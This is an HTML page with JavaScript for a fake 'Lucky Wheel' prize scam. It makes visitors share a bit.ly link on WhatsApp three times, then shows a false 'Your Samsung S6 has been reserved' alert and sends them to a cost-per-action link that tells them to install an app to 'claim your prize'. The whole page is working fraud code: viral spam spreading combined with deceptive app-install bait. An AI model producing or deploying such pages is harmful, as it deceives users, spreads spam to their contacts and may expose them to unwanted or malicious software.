<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Untitled Document</title>
</head>

	<style type="text/css">
		
		.whatsapp-wrapper {
			max-width:600px;
			margin: 0 auto;
			display: block;
		}
		
		a{
			display: block;
			background-color: #39579a;
			border-radius: 7px;
			-moz-border-radius: 7px;
			-webkit-border-radius: 7px;
			padding: 30px 0;
			text-align: center;
			font-weight: 700;
			color: #fff;
			font-size: 3em;
			border-bottom: 1px solid #1b316c;
			margin: 7px 13px 5px;
			text-decoration: none;
			font-family: tahoma, verdana, arial, sans-serif;
		}
		
		a img{
    		    width: 40px;
				padding-left: 12px;
				padding-right: 12px;
		}
	</style>

<body>

<div class = "whatsapp-wrapper">
	<a onclick="fn1(this); goNow();"><img src="img/ewjpzrp.png">SHARE<img src="img/ewjpzrp.png"></a>
		
	<a onclick="fn2(this); goNow();">CONTINUE</a>
</div>



<script type = "text/javascript">
	
var myarray = ["whatsapp://send?text=Have you seen this? http://bit.ly/win-win-prizes", "whatsapp://send?text=Look http://bit.ly/win-win-prizes"],
showMessage = myarray[Math.floor(Math.random() * myarray.length)];
c = 0;
	
function goNow() {
	
	//!0 means true
    window.btn_clicked = !0;
}

function fn1() {
	++c;
			
	if(c <= 3){
		window.open(showMessage);
	}
	
	else {
		// if sharing has been done more than 3 times then you will get an alert message and it will redirect you to http://cpa.ly/7Mur
		alert("Your Samsung S6 has been reserved.\n\nTo verify your details, Install app on the next page to claim your prize!");
		window.open("http://cpa.ly/7MUr", "_self");
	}	   
}

function fn2() {
	
	alert(c);
	
	if(c >= 3) {
	   alert("Your Samsung S6 has been reserved.\n\nTo verify your details, Install app on the next page to claim your prize") & window.open("http://cpa.ly/7MUr", "_self");
	}
	else {
		window.alert("Tell 3 friends on WhatsApp about the Lucky Wheel!\n\n You already told: " + c);
	}
      
}
	
</script>
</body>
</html>

